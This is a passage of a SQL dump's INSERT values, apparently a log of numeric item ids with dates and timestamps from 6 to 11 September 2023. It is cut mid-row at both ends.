02:41:02'),(84340,4709,1,'2023-09-06','2023-09-06 02:43:14'),(84341,4960,1,'2023-09-06','2023-09-06 02:51:01'),(84342,4688,1,'2023-09-06','2023-09-06 02:54:29'),(84343,470,1,'2023-09-06','2023-09-06 03:00:06'),(84344,5310,1,'2023-09-06','2023-09-06 03:05:44'),(84345,470,1,'2023-09-06','2023-09-06 03:08:34'),(84346,4966,1,'2023-09-06','2023-09-06 03:14:12'),(84347,1734,1,'2023-09-06','2023-09-06 03:17:02'),(84348,4674,1,'2023-09-06','2023-09-06 03:22:38'),(84349,5292,1,'2023-09-06','2023-09-06 03:25:25'),(84350,4416,1,'2023-09-06','2023-09-06 03:26:04'),(84351,5253,1,'2023-09-06','2023-09-06 03:26:05'),(84352,5295,1,'2023-09-06','2023-09-06 03:31:04'),(84353,5122,1,'2023-09-06','2023-09-06 03:36:42'),(84354,1586,1,'2023-09-06','2023-09-06 03:39:30'),(84355,4391,1,'2023-09-06','2023-09-06 03:42:21'),(84356,4709,1,'2023-09-06','2023-09-06 03:45:07'),(84357,1872,1,'2023-09-06','2023-09-06 03:47:56'),(84358,5304,1,'2023-09-06','2023-09-06 03:53:34'),(84359,5310,1,'2023-09-06','2023-09-06 04:08:45'),(84360,1872,1,'2023-09-06','2023-09-06 04:11:34'),(84361,1877,1,'2023-09-06','2023-09-06 04:26:45'),(84362,4966,1,'2023-09-06','2023-09-06 04:29:35'),(84363,4428,1,'2023-09-06','2023-09-06 04:33:00'),(84364,2904,1,'2023-09-06','2023-09-06 04:34:09'),(84365,3253,1,'2023-09-06','2023-09-06 04:34:16'),(84366,1608,1,'2023-09-06','2023-09-06 04:34:23'),(84367,4424,1,'2023-09-06','2023-09-06 04:34:27'),(84368,2993,1,'2023-09-06','2023-09-06 04:34:29'),(84369,1596,1,'2023-09-06','2023-09-06 04:38:46'),(84370,4911,1,'2023-09-06','2023-09-06 04:54:54'),(84371,5307,1,'2023-09-06','2023-09-06 05:23:45'),(84372,5163,1,'2023-09-06','2023-09-06 06:06:16'),(84373,4440,1,'2023-09-06','2023-09-06 06:15:05'),(84374,4703,1,'2023-09-06','2023-09-06 06:48:34'),(84375,4697,1,'2023-09-06','2023-09-06 07:33:35'),(84376,4776,1,'2023-09-06','2023-09-06 08:20:03'),(84377,487,1,'2023-09-06','2023-09-06 08:21:32'),(84378,473,1,'2023-09-06','2023-09-06 08:21:32'),(84379,473,1,'2023-09-06','2023-09-06 08:26:34'),(84380,1870,1,'2023-09-06','2023-09-06 08:26:34'),(84381,487,1,'2023-09-06','2023-09-06 08:30:47'),(84382,473,1,'2023-09-06','2023-09-06 08:30:47'),(84383,1872,1,'2023-09-06','2023-09-06 08:32:20'),(84384,473,1,'2023-09-06','2023-09-06 08:32:20'),(84385,4703,1,'2023-09-06','2023-09-06 09:50:03'),(84386,1612,1,'2023-09-06','2023-09-06 10:18:10'),(84387,5163,1,'2023-09-06','2023-09-06 10:18:30'),(84388,5163,1,'2023-09-06','2023-09-06 10:19:58'),(84389,4911,1,'2023-09-06','2023-09-06 10:23:47'),(84390,4977,1,'2023-09-06','2023-09-06 10:47:50'),(84391,4412,1,'2023-09-06','2023-09-06 10:51:41'),(84392,4960,1,'2023-09-06','2023-09-06 11:29:39'),(84393,1544,1,'2023-09-06','2023-09-06 11:50:42'),(84394,4911,1,'2023-09-06','2023-09-06 12:03:51'),(84395,2165,1,'2023-09-06','2023-09-06 12:20:01'),(84396,1596,1,'2023-09-06','2023-09-06 13:03:43'),(84397,1598,1,'2023-09-06','2023-09-06 13:33:05'),(84398,474,1,'2023-09-06','2023-09-06 13:43:04'),(84399,72,1,'2023-09-06','2023-09-06 14:05:16'),(84400,4432,1,'2023-09-06','2023-09-06 14:17:06'),(84401,5298,1,'2023-09-06','2023-09-06 14:30:14'),(84402,4556,1,'2023-09-06','2023-09-06 14:57:35'),(84403,1745,1,'2023-09-06','2023-09-06 14:59:08'),(84404,2904,1,'2023-09-06','2023-09-06 15:06:35'),(84405,4542,1,'2023-09-06','2023-09-06 15:08:04'),(84406,5292,1,'2023-09-06','2023-09-06 15:15:35'),(84407,4950,1,'2023-09-06','2023-09-06 15:24:35'),(84408,487,1,'2023-09-06','2023-09-06 15:24:41'),(84409,474,1,'2023-09-06','2023-09-06 15:33:35'),(84410,5289,1,'2023-09-06','2023-09-06 15:42:35'),(84411,5301,1,'2023-09-06','2023-09-06 15:42:39'),(84412,480,1,'2023-09-06','2023-09-06 15:44:05'),(84413,5163,1,'2023-09-06','2023-09-06 15:44:06'),(84414,4977,1,'2023-09-06','2023-09-06 15:51:46'),(84415,4966,1,'2023-09-06','2023-09-06 16:01:41'),(84416,4685,1,'2023-09-06','2023-09-06 16:05:06'),(84417,4960,1,'2023-09-06','2023-09-06 16:19:00'),(84418,4741,1,'2023-09-06','2023-09-06 16:27:06'),(84419,4911,1,'2023-09-06','2023-09-06 17:09:05'),(84420,5163,1,'2023-09-06','2023-09-06 17:14:10'),(84421,4529,1,'2023-09-06','2023-09-06 17:38:04'),(84422,5163,1,'2023-09-06','2023-09-06 17:59:12'),(84423,4694,1,'2023-09-06','2023-09-06 18:23:04'),(84424,5292,1,'2023-09-06','2023-09-06 20:34:12'),(84425,4542,1,'2023-09-06','2023-09-06 21:33:08'),(84426,5301,1,'2023-09-06','2023-09-06 21:34:11'),(84427,5256,1,'2023-09-06','2023-09-06 21:50:12'),(84428,5005,1,'2023-09-06','2023-09-06 21:52:05'),(84429,4688,1,'2023-09-06','2023-09-06 22:08:04'),(84430,2457,1,'2023-09-06','2023-09-06 22:11:59'),(84431,1877,1,'2023-09-06','2023-09-06 22:19:13'),(84432,1604,1,'2023-09-06','2023-09-06 23:04:52'),(84433,4703,1,'2023-09-07','2023-09-07 02:53:19'),(84434,4688,1,'2023-09-07','2023-09-07 02:58:48'),(84435,4779,1,'2023-09-07','2023-09-07 02:59:16'),(84436,5280,1,'2023-09-07','2023-09-07 02:59:30'),(84437,335,1,'2023-09-07','2023-09-07 02:59:33'),(84438,2309,1,'2023-09-07','2023-09-07 03:04:47'),(84439,5320,1,'2023-09-07','2023-09-07 03:27:17'),(84440,80,1,'2023-09-07','2023-09-07 03:27:19'),(84441,4524,1,'2023-09-07','2023-09-07 03:32:54'),(84442,3698,1,'2023-09-07','2023-09-07 03:38:12'),(84443,74,1,'2023-09-07','2023-09-07 03:44:11'),(84444,1596,1,'2023-09-07','2023-09-07 03:47:19'),(84445,4524,1,'2023-09-07','2023-09-07 03:53:14'),(84446,3735,1,'2023-09-07','2023-09-07 04:06:38'),(84447,4779,1,'2023-09-07','2023-09-07 04:11:12'),(84448,5320,1,'2023-09-07','2023-09-07 04:20:09'),(84449,470,1,'2023-09-07','2023-09-07 04:23:33'),(84450,4712,1,'2023-09-07','2023-09-07 04:29:13'),(84451,1608,1,'2023-09-07','2023-09-07 04:29:15'),(84452,5280,1,'2023-09-07','2023-09-07 05:01:54'),(84453,5101,1,'2023-09-07','2023-09-07 05:38:33'),(84454,2904,1,'2023-09-07','2023-09-07 05:45:38'),(84455,4712,1,'2023-09-07','2023-09-07 05:59:12'),(84456,5163,1,'2023-09-07','2023-09-07 06:25:46'),(84457,5304,1,'2023-09-07','2023-09-07 06:30:39'),(84458,4685,1,'2023-09-07','2023-09-07 07:08:33'),(84459,1745,1,'2023-09-07','2023-09-07 07:30:14'),(84460,1766,1,'2023-09-07','2023-09-07 08:38:56'),(84461,3107,1,'2023-09-07','2023-09-07 08:56:49'),(84462,4938,1,'2023-09-07','2023-09-07 09:45:44'),(84463,4524,1,'2023-09-07','2023-09-07 10:00:40'),(84464,5304,1,'2023-09-07','2023-09-07 11:00:28'),(84465,4681,1,'2023-09-07','2023-09-07 11:00:30'),(84466,5062,1,'2023-09-07','2023-09-07 11:02:47'),(84467,4938,1,'2023-09-07','2023-09-07 11:03:41'),(84468,5334,1,'2023-09-07','2023-09-07 12:12:27'),(84469,1598,1,'2023-09-07','2023-09-07 12:24:29'),(84470,5253,1,'2023-09-07','2023-09-07 12:33:12'),(84471,1598,1,'2023-09-07','2023-09-07 12:36:20'),(84472,5163,1,'2023-09-07','2023-09-07 13:26:26'),(84473,5163,1,'2023-09-07','2023-09-07 13:26:33'),(84474,4618,1,'2023-09-07','2023-09-07 13:52:22'),(84475,1582,1,'2023-09-07','2023-09-07 13:57:52'),(84476,570,1,'2023-09-07','2023-09-07 14:02:52'),(84477,1774,1,'2023-09-07','2023-09-07 14:17:54'),(84478,4301,1,'2023-09-07','2023-09-07 14:21:47'),(84479,5001,1,'2023-09-07','2023-09-07 14:32:01'),(84480,5334,1,'2023-09-07','2023-09-07 15:05:56'),(84481,4980,1,'2023-09-07','2023-09-07 15:14:00'),(84482,4980,1,'2023-09-07','2023-09-07 15:15:35'),(84483,1596,1,'2023-09-07','2023-09-07 15:22:31'),(84484,2309,1,'2023-09-07','2023-09-07 15:30:21'),(84485,4412,1,'2023-09-07','2023-09-07 15:33:16'),(84486,4674,1,'2023-09-07','2023-09-07 15:34:25'),(84487,570,1,'2023-09-07','2023-09-07 15:46:30'),(84488,4556,1,'2023-09-07','2023-09-07 15:56:53'),(84489,5295,1,'2023-09-07','2023-09-07 16:03:28'),(84490,4709,1,'2023-09-07','2023-09-07 16:17:23'),(84491,3673,1,'2023-09-07','2023-09-07 16:18:13'),(84492,4694,1,'2023-09-07','2023-09-07 16:31:39'),(84493,1877,1,'2023-09-07','2023-09-07 17:03:12'),(84494,5137,1,'2023-09-07','2023-09-07 18:04:07'),(84495,3673,1,'2023-09-07','2023-09-07 18:33:11'),(84496,1745,1,'2023-09-07','2023-09-07 18:38:47'),(84497,1582,1,'2023-09-07','2023-09-07 19:51:25'),(84498,3482,1,'2023-09-07','2023-09-07 20:16:39'),(84499,3482,1,'2023-09-07','2023-09-07 20:29:33'),(84500,3482,1,'2023-09-07','2023-09-07 20:30:14'),(84501,5307,1,'2023-09-07','2023-09-07 20:37:16'),(84502,4776,1,'2023-09-07','2023-09-07 20:48:11'),(84503,5304,1,'2023-09-07','2023-09-07 21:34:19'),(84504,2904,1,'2023-09-07','2023-09-07 22:08:53'),(84505,4960,1,'2023-09-07','2023-09-07 22:14:15'),(84506,4960,1,'2023-09-07','2023-09-07 22:14:58'),(84507,1606,1,'2023-09-07','2023-09-07 22:39:26'),(84508,2457,1,'2023-09-07','2023-09-07 23:52:16'),(84509,2457,1,'2023-09-08','2023-09-08 00:14:45'),(84510,1596,1,'2023-09-08','2023-09-08 00:43:11'),(84511,1586,1,'2023-09-08','2023-09-08 01:50:24'),(84512,4368,1,'2023-09-08','2023-09-08 02:48:43'),(84513,3060,1,'2023-09-08','2023-09-08 02:55:43'),(84514,3060,1,'2023-09-08','2023-09-08 03:40:44'),(84515,1606,1,'2023-09-08','2023-09-08 03:53:11'),(84516,3774,1,'2023-09-08','2023-09-08 04:00:48'),(84517,3083,1,'2023-09-08','2023-09-08 04:06:12'),(84518,2457,1,'2023-09-08','2023-09-08 04:25:45'),(84519,4368,1,'2023-09-08','2023-09-08 04:27:42'),(84520,4776,1,'2023-09-08','2023-09-08 06:00:16'),(84521,4911,1,'2023-09-08','2023-09-08 06:30:47'),(84522,1877,1,'2023-09-08','2023-09-08 06:44:31'),(84523,474,1,'2023-09-08','2023-09-08 06:45:41'),(84524,476,1,'2023-09-08','2023-09-08 06:48:18'),(84525,5310,1,'2023-09-08','2023-09-08 06:53:11'),(84526,4694,1,'2023-09-08','2023-09-08 06:55:47'),(84527,470,1,'2023-09-08','2023-09-08 07:11:10'),(84528,5295,1,'2023-09-08','2023-09-08 07:13:48'),(84529,5307,1,'2023-09-08','2023-09-08 07:26:41'),(84530,5301,1,'2023-09-08','2023-09-08 07:29:57'),(84531,5292,1,'2023-09-08','2023-09-08 07:31:47'),(84532,5304,1,'2023-09-08','2023-09-08 07:47:11'),(84533,3038,1,'2023-09-08','2023-09-08 07:49:46'),(84534,1606,1,'2023-09-08','2023-09-08 07:49:53'),(84535,4681,1,'2023-09-08','2023-09-08 07:55:35'),(84536,4703,1,'2023-09-08','2023-09-08 08:04:19'),(84537,4674,1,'2023-09-08','2023-09-08 08:05:11'),(84538,4524,1,'2023-09-08','2023-09-08 08:23:15'),(84539,2904,1,'2023-09-08','2023-09-08 08:25:53'),(84540,1870,1,'2023-09-08','2023-09-08 08:35:31'),(84541,473,1,'2023-09-08','2023-09-08 08:35:31'),(84542,5295,1,'2023-09-08','2023-09-08 08:41:11'),(84543,4697,1,'2023-09-08','2023-09-08 08:49:12'),(84544,4688,1,'2023-09-08','2023-09-08 08:59:11'),(84545,470,1,'2023-09-08','2023-09-08 09:01:46'),(84546,74,1,'2023-09-08','2023-09-08 09:17:14'),(84547,5292,1,'2023-09-08','2023-09-08 09:19:47'),(84548,80,1,'2023-09-08','2023-09-08 09:33:20'),(84549,5101,1,'2023-09-08','2023-09-08 09:34:21'),(84550,487,1,'2023-09-08','2023-09-08 09:35:11'),(84551,4709,1,'2023-09-08','2023-09-08 09:53:11'),(84552,1544,1,'2023-09-08','2023-09-08 10:25:48'),(84553,5163,1,'2023-09-08','2023-09-08 10:30:35'),(84554,4911,1,'2023-09-08','2023-09-08 10:31:39'),(84555,4938,1,'2023-09-08','2023-09-08 10:45:36'),(84556,2904,1,'2023-09-08','2023-09-08 10:53:11'),(84557,4911,1,'2023-09-08','2023-09-08 10:55:28'),(84558,469,1,'2023-09-08','2023-09-08 10:56:30'),(84559,5289,1,'2023-09-08','2023-09-08 11:03:29'),(84560,5101,1,'2023-09-08','2023-09-08 11:04:14'),(84561,3104,1,'2023-09-08','2023-09-08 11:18:17'),(84562,91,1,'2023-09-08','2023-09-08 11:19:13'),(84563,91,1,'2023-09-08','2023-09-08 11:20:05'),(84564,76,1,'2023-09-08','2023-09-08 11:20:31'),(84565,89,1,'2023-09-08','2023-09-08 11:20:46'),(84566,1600,1,'2023-09-08','2023-09-08 11:21:01'),(84567,4674,1,'2023-09-08','2023-09-08 11:25:47'),(84568,4412,1,'2023-09-08','2023-09-08 11:30:59'),(84569,4950,1,'2023-09-08','2023-09-08 11:55:38'),(84570,68,1,'2023-09-08','2023-09-08 11:56:08'),(84571,4950,1,'2023-09-08','2023-09-08 11:56:18'),(84572,4400,1,'2023-09-08','2023-09-08 12:15:08'),(84573,5163,1,'2023-09-08','2023-09-08 12:45:56'),(84574,2156,1,'2023-09-08','2023-09-08 12:55:46'),(84575,1745,1,'2023-09-08','2023-09-08 13:13:52'),(84576,91,1,'2023-09-08','2023-09-08 13:26:15'),(84577,72,1,'2023-09-08','2023-09-08 13:29:26'),(84578,5113,1,'2023-09-08','2023-09-08 13:29:56'),(84579,72,1,'2023-09-08','2023-09-08 13:30:10'),(84580,5371,1,'2023-09-08','2023-09-08 13:30:24'),(84581,1594,1,'2023-09-08','2023-09-08 13:58:32'),(84582,4566,1,'2023-09-08','2023-09-08 13:58:46'),(84583,2911,1,'2023-09-08','2023-09-08 13:59:37'),(84584,4529,1,'2023-09-08','2023-09-08 14:04:07'),(84585,5268,1,'2023-09-08','2023-09-08 14:08:39'),(84586,4520,1,'2023-09-08','2023-09-08 14:23:33'),(84587,4960,1,'2023-09-08','2023-09-08 14:26:52'),(84588,5128,1,'2023-09-08','2023-09-08 14:29:13'),(84589,1594,1,'2023-09-08','2023-09-08 14:36:09'),(84590,4517,1,'2023-09-08','2023-09-08 14:52:47'),(84591,5323,1,'2023-09-08','2023-09-08 14:56:56'),(84592,4551,1,'2023-09-08','2023-09-08 15:00:27'),(84593,5125,1,'2023-09-08','2023-09-08 15:03:51'),(84594,4514,1,'2023-09-08','2023-09-08 15:21:10'),(84595,5134,1,'2023-09-08','2023-09-08 15:22:56'),(84596,4911,1,'2023-09-08','2023-09-08 15:29:30'),(84597,5131,1,'2023-09-08','2023-09-08 15:29:49'),(84598,80,1,'2023-09-08','2023-09-08 15:30:31'),(84599,76,1,'2023-09-08','2023-09-08 15:38:29'),(84600,470,1,'2023-09-08','2023-09-08 15:45:25'),(84601,4566,1,'2023-09-08','2023-09-08 15:47:08'),(84602,4930,1,'2023-09-08','2023-09-08 15:49:03'),(84603,4963,1,'2023-09-08','2023-09-08 15:49:31'),(84604,4520,1,'2023-09-08','2023-09-08 15:52:48'),(84605,2156,1,'2023-09-08','2023-09-08 15:55:48'),(84606,5122,1,'2023-09-08','2023-09-08 16:04:26'),(84607,5268,1,'2023-09-08','2023-09-08 16:13:05'),(84608,5280,1,'2023-09-08','2023-09-08 16:22:53'),(84609,474,1,'2023-09-08','2023-09-08 16:29:42'),(84610,5131,1,'2023-09-08','2023-09-08 16:30:24'),(84611,5320,1,'2023-09-08','2023-09-08 16:39:40'),(84612,1582,1,'2023-09-08','2023-09-08 16:40:02'),(84613,87,1,'2023-09-08','2023-09-08 16:40:35'),(84614,1582,1,'2023-09-08','2023-09-08 16:40:59'),(84615,91,1,'2023-09-08','2023-09-08 16:43:58'),(84616,5163,1,'2023-09-08','2023-09-08 16:45:44'),(84617,5128,1,'2023-09-08','2023-09-08 16:47:44'),(84618,5146,1,'2023-09-08','2023-09-08 16:48:32'),(84619,2704,1,'2023-09-08','2023-09-08 16:52:53'),(84620,4517,1,'2023-09-08','2023-09-08 16:52:58'),(84621,5320,1,'2023-09-08','2023-09-08 16:56:22'),(84622,4966,1,'2023-09-08','2023-09-08 17:25:23'),(84623,5128,1,'2023-09-08','2023-09-08 17:26:21'),(84624,5125,1,'2023-09-08','2023-09-08 17:56:21'),(84625,4694,1,'2023-09-08','2023-09-08 18:03:21'),(84626,474,1,'2023-09-08','2023-09-08 18:04:12'),(84627,473,1,'2023-09-08','2023-09-08 18:04:12'),(84628,487,1,'2023-09-08','2023-09-08 18:08:53'),(84629,473,1,'2023-09-08','2023-09-08 18:08:53'),(84630,1582,1,'2023-09-08','2023-09-08 19:25:18'),(84631,4911,1,'2023-09-08','2023-09-08 19:29:22'),(84632,3764,1,'2023-09-08','2023-09-08 19:36:48'),(84633,1606,1,'2023-09-08','2023-09-08 19:56:23'),(84634,1544,1,'2023-09-08','2023-09-08 20:03:22'),(84635,4911,1,'2023-09-08','2023-09-08 20:44:43'),(84636,5292,1,'2023-09-08','2023-09-08 21:26:22'),(84637,4368,1,'2023-09-08','2023-09-08 22:07:57'),(84638,4911,1,'2023-09-08','2023-09-08 22:40:06'),(84639,5163,1,'2023-09-08','2023-09-08 23:25:39'),(84640,80,1,'2023-09-09','2023-09-09 00:18:54'),(84641,1606,1,'2023-09-09','2023-09-09 02:17:58'),(84642,1606,1,'2023-09-09','2023-09-09 02:18:44'),(84643,72,1,'2023-09-09','2023-09-09 02:20:40'),(84644,1596,1,'2023-09-09','2023-09-09 02:29:14'),(84645,1602,1,'2023-09-09','2023-09-09 02:43:04'),(84646,1602,1,'2023-09-09','2023-09-09 03:05:40'),(84647,91,1,'2023-09-09','2023-09-09 03:22:39'),(84648,72,1,'2023-09-09','2023-09-09 03:23:43'),(84649,5334,1,'2023-09-09','2023-09-09 03:34:53'),(84650,1594,1,'2023-09-09','2023-09-09 03:46:08'),(84651,2904,1,'2023-09-09','2023-09-09 03:50:31'),(84652,5253,1,'2023-09-09','2023-09-09 03:50:37'),(84653,2704,1,'2023-09-09','2023-09-09 03:50:38'),(84654,5304,1,'2023-09-09','2023-09-09 03:57:28'),(84655,4706,1,'2023-09-09','2023-09-09 04:03:41'),(84656,2159,1,'2023-09-09','2023-09-09 04:06:23'),(84657,1594,1,'2023-09-09','2023-09-09 04:12:26'),(84658,4709,1,'2023-09-09','2023-09-09 04:20:31'),(84659,5134,1,'2023-09-09','2023-09-09 04:33:28'),(84660,4706,1,'2023-09-09','2023-09-09 04:33:31'),(84661,4938,1,'2023-09-09','2023-09-09 04:34:21'),(84662,1614,1,'2023-09-09','2023-09-09 04:43:28'),(84663,1614,1,'2023-09-09','2023-09-09 04:45:51'),(84664,1614,1,'2023-09-09','2023-09-09 04:47:42'),(84665,1594,1,'2023-09-09','2023-09-09 05:04:53'),(84666,5280,1,'2023-09-09','2023-09-09 05:56:37'),(84667,3275,1,'2023-09-09','2023-09-09 06:08:29'),(84668,1594,1,'2023-09-09','2023-09-09 07:05:09'),(84669,4520,1,'2023-09-09','2023-09-09 07:25:54'),(84670,4677,1,'2023-09-09','2023-09-09 07:33:22'),(84671,5058,1,'2023-09-09','2023-09-09 08:15:39'),(84672,3706,1,'2023-09-09','2023-09-09 09:23:27'),(84673,4911,1,'2023-09-09','2023-09-09 11:02:00'),(84674,1594,1,'2023-09-09','2023-09-09 13:27:06'),(84675,3482,1,'2023-09-09','2023-09-09 13:48:27'),(84676,3788,1,'2023-09-09','2023-09-09 14:33:29'),(84677,3482,1,'2023-09-09','2023-09-09 15:18:29'),(84678,3788,1,'2023-09-09','2023-09-09 15:18:32'),(84679,1602,1,'2023-09-09','2023-09-09 16:03:34'),(84680,4966,1,'2023-09-09','2023-09-09 17:19:57'),(84681,4520,1,'2023-09-09','2023-09-09 17:33:29'),(84682,472,1,'2023-09-09','2023-09-09 18:01:13'),(84683,1602,1,'2023-09-09','2023-09-09 18:03:31'),(84684,472,1,'2023-09-09','2023-09-09 18:46:08'),(84685,5307,1,'2023-09-09','2023-09-09 19:03:30'),(84686,4332,1,'2023-09-09','2023-09-09 20:00:59'),(84687,570,1,'2023-09-09','2023-09-09 20:30:11'),(84688,474,1,'2023-09-09','2023-09-09 20:31:29'),(84689,5062,1,'2023-09-09','2023-09-09 20:44:08'),(84690,4712,1,'2023-09-09','2023-09-09 22:48:26'),(84691,1594,1,'2023-09-10','2023-09-10 01:30:35'),(84692,1604,1,'2023-09-10','2023-09-10 01:38:31'),(84693,1594,1,'2023-09-10','2023-09-10 01:40:39'),(84694,1600,1,'2023-09-10','2023-09-10 01:53:31'),(84695,4561,1,'2023-09-10','2023-09-10 01:53:36'),(84696,5280,1,'2023-09-10','2023-09-10 02:04:34'),(84697,2297,1,'2023-09-10','2023-09-10 02:04:39'),(84698,80,1,'2023-09-10','2023-09-10 02:04:59'),(84699,5080,1,'2023-09-10','2023-09-10 02:06:53'),(84700,4529,1,'2023-09-10','2023-09-10 02:16:00'),(84701,4561,1,'2023-09-10','2023-09-10 02:38:28'),(84702,1600,1,'2023-09-10','2023-09-10 02:38:32'),(84703,4520,1,'2023-09-10','2023-09-10 02:49:35'),(84704,5295,1,'2023-09-10','2023-09-10 02:49:43'),(84705,2152,1,'2023-09-10','2023-09-10 02:58:43'),(84706,2252,1,'2023-09-10','2023-09-10 03:11:04'),(84707,5320,1,'2023-09-10','2023-09-10 03:14:27'),(84708,4520,1,'2023-09-10','2023-09-10 03:23:28'),(84709,5122,1,'2023-09-10','2023-09-10 03:32:32'),(84710,5292,1,'2023-09-10','2023-09-10 04:32:28'),(84711,2904,1,'2023-09-10','2023-09-10 04:50:13'),(84712,3090,1,'2023-09-10','2023-09-10 04:57:15'),(84713,474,1,'2023-09-10','2023-09-10 06:46:34'),(84714,470,1,'2023-09-10','2023-09-10 07:09:03'),(84715,4674,1,'2023-09-10','2023-09-10 07:32:29'),(84716,3006,1,'2023-09-10','2023-09-10 07:49:28'),(84717,5304,1,'2023-09-10','2023-09-10 08:17:30'),(84718,3742,1,'2023-09-10','2023-09-10 08:56:53'),(84719,72,1,'2023-09-10','2023-09-10 09:00:38'),(84720,469,1,'2023-09-10','2023-09-10 09:09:39'),(84721,1592,1,'2023-09-10','2023-09-10 09:18:35'),(84722,4566,1,'2023-09-10','2023-09-10 09:47:28'),(84723,1590,1,'2023-09-10','2023-09-10 10:07:32'),(84724,4911,1,'2023-09-10','2023-09-10 10:34:47'),(84725,2904,1,'2023-09-10','2023-09-10 10:36:19'),(84726,2904,1,'2023-09-10','2023-09-10 10:36:22'),(84727,1608,1,'2023-09-10','2023-09-10 10:41:40'),(84728,2904,1,'2023-09-10','2023-09-10 10:42:24'),(84729,4911,1,'2023-09-10','2023-09-10 10:42:29'),(84730,80,1,'2023-09-10','2023-09-10 10:43:26'),(84731,4700,1,'2023-09-10','2023-09-10 10:45:01'),(84732,4238,1,'2023-09-10','2023-09-10 13:12:21'),(84733,5259,1,'2023-09-10','2023-09-10 13:55:34'),(84734,4759,1,'2023-09-10','2023-09-10 13:55:36'),(84735,470,1,'2023-09-10','2023-09-10 14:28:04'),(84736,4454,1,'2023-09-10','2023-09-10 14:40:34'),(84737,2809,1,'2023-09-10','2023-09-10 14:55:38'),(84738,5289,1,'2023-09-10','2023-09-10 15:01:36'),(84739,4703,1,'2023-09-10','2023-09-10 15:23:14'),(84740,4454,1,'2023-09-10','2023-09-10 15:25:34'),(84741,2904,1,'2023-09-10','2023-09-10 15:47:29'),(84742,4681,1,'2023-09-10','2023-09-10 15:50:46'),(84743,5128,1,'2023-09-10','2023-09-10 16:01:34'),(84744,1872,1,'2023-09-10','2023-09-10 16:02:28'),(84745,1877,1,'2023-09-10','2023-09-10 16:16:34'),(84746,5323,1,'2023-09-10','2023-09-10 16:17:28'),(84747,2809,1,'2023-09-10','2023-09-10 16:18:28'),(84748,4966,1,'2023-09-10','2023-09-10 16:36:13'),(84749,5289,1,'2023-09-10','2023-09-10 16:45:54'),(84750,5334,1,'2023-09-10','2023-09-10 16:46:34'),(84751,4520,1,'2023-09-10','2023-09-10 16:50:57'),(84752,4776,1,'2023-09-10','2023-09-10 16:51:48'),(84753,5298,1,'2023-09-10','2023-09-10 17:31:34'),(84754,5280,1,'2023-09-10','2023-09-10 17:35:56'),(84755,4685,1,'2023-09-10','2023-09-10 18:21:49'),(84756,4517,1,'2023-09-10','2023-09-10 18:23:51'),(84757,4776,1,'2023-09-10','2023-09-10 19:50:45'),(84758,5268,1,'2023-09-10','2023-09-10 19:50:51'),(84759,3764,1,'2023-09-10','2023-09-10 19:51:20'),(84760,4524,1,'2023-09-10','2023-09-10 19:51:21'),(84761,4529,1,'2023-09-10','2023-09-10 19:51:21'),(84762,1711,1,'2023-09-10','2023-09-10 20:04:40'),(84763,5337,1,'2023-09-10','2023-09-10 20:31:36'),(84764,4709,1,'2023-09-10','2023-09-10 22:01:36'),(84765,74,1,'2023-09-10','2023-09-10 23:03:35'),(84766,4694,1,'2023-09-10','2023-09-10 23:31:34'),(84767,3004,1,'2023-09-11','2023-09-11 02:01:40'),(84768,5268,1,'2023-09-11','2023-09-11 02:01:45'),(84769,4517,1,'2023-09-11','2023-09-11 02:01:53'),(84770,5253,1,'2023-09-11','2023-09-11 02:01:54'),(84771,468,1,'2023-09-11','2023-09-11 02:05:37'),(84772,5314,1,'2023-09-11','2023-09-11 02:18:44'),(84773,4753,1,'2023-09-11','2023-09-11 02:20:36'),(84774,4983,1,'2023-09-11','2023-09-11 02:25:37'),(84775,474,1,'2023-09-11','2023-09-11 02:35:37'),(84776,4976,1,'2023-09-11','2023-09-11 02:45:36'),(84777,4977,1,'2023-09-11','2023-09-11 03:05:35'),(84778,4622,1,'2023-09-11','2023-09-11 03:25:40'),(84779,4911,1,'2023-09-11','2023-09-11 03:54:03'),(84780,2991,1,'2023-09-11','2023-09-11 03:55:38'),(84781,2991,1,'2023-09-11','2023-09-11 04:25:41'),(84782,4753,1,'2023-09-11','2023-09-11 04:35:36'),(84783,2457,1,'2023-09-11','2023-09-11 04:55:38'),(84784,3706,1,'2023-09-11','2023-09-11 05:10:36'),(84785,2704,1,'2023-09-11','2023-09-11 06:30:11'),(84786,3023,1,'2023-09-11','2023-09-11 07:24:50'),(84787,76,1,'2023-09-11','2023-09-11 07:27:11'),(84788,570,1,'2023-09-11','2023-09-11 07:55:39'),(84789,4911,1,'2023-09-11','2023-09-11 08:26:11'),(84790,80,1,'2023-09-11','2023-09-11 09:16:54'),(84791,4454,1,'2023-09-11','2023-09-11 10:03:48'),(84792,5101,1,'2023-09-11','2023-09-11 10:25:35'),(84793,80,1,'2023-09-11','2023-09-11 11:40:43'),(84794,5256,1,'2023-09-11','2023-09-11 12:04:50'),(84795,2154,1,'2023-09-11','2023-09-11 12:50:57'),(84796,1614,1,'2023-09-11','2023-09-11 13:04:37'),(84797,1588,1,'2023-09-11','2023-09-11 13:05:16'),(84798,4520,1,'2023-09-11','2023-09-11 13:05:50'),(84799,76,1,'2023-09-11','2023-09-11 13:10:24'),(84800,5353,1,'2023-09-11','2023-09-11 13:11:38'),(84801,468,1,'2023-09-11','2023-09-11 13:34:40'),(84802,2159,1,'2023-09-11','2023-09-11 13:41:46'),(84803,4966,1,'2023-09-11','2023-09-11 13:45:28'),(84804,68,1,'2023-09-11','2023-09-11 13:50:40'),(84805,5163,1,'2023-09-11','2023-09-11 14:04:17'),(84806,80,1,'2023-09-11','2023-09-11 14:08:25'),(84807,80,1,'2023-09-11','2023-09-11 14:12:17'),(84808,1582,1,'2023-09-11','2023-09-11 14:13:17'),(84809,4963,1,'2023-09-11','2023-09-11 14:21:06'),(84810,5304,1,'2023-09-11','2023-09-11 14:41:28'),(84811,5163,1,'2023-09-11','2023-09-11 14:52:32'),(84812,5163,1,'2023-09-11','2023-09-11 14:52:32'),(84813,4960,1,'2023-09-11','2023-09-11 15:12:19'),(84814,89,1,'2023-09-11','2023-09-11 15:13:17'),(84815,89,1,'2023-09-11','2023-09-11 15:13:36'),(84816,89,1,'2023-09-11','2023-09-11 15:14:05'),(84817,4930,1,'2023-09-11','2023-09-11 15:14:12'),(84818,4960,1,'2023-09-11','2023-09-11 15:14:20'),(84819,335,1,'2023-09-11','2023-09-11 15:14:39'),(84820,91,1,'2023-09-11','2023-09-11 15:15:15'),(84821,4412,1,'2023-09-11','2023-09-11 15:50:16'),(84822,4963,1,'2023-09-11','2023-09-11 15:56:39'),(84823,1582,1,'2023-09-11','2023-09-11 16:20:42'),(84824,87,1,'2023-09-11','2023-09-11 16:23:50'),(84825,5353,1,'2023-09-11','2023-09-11 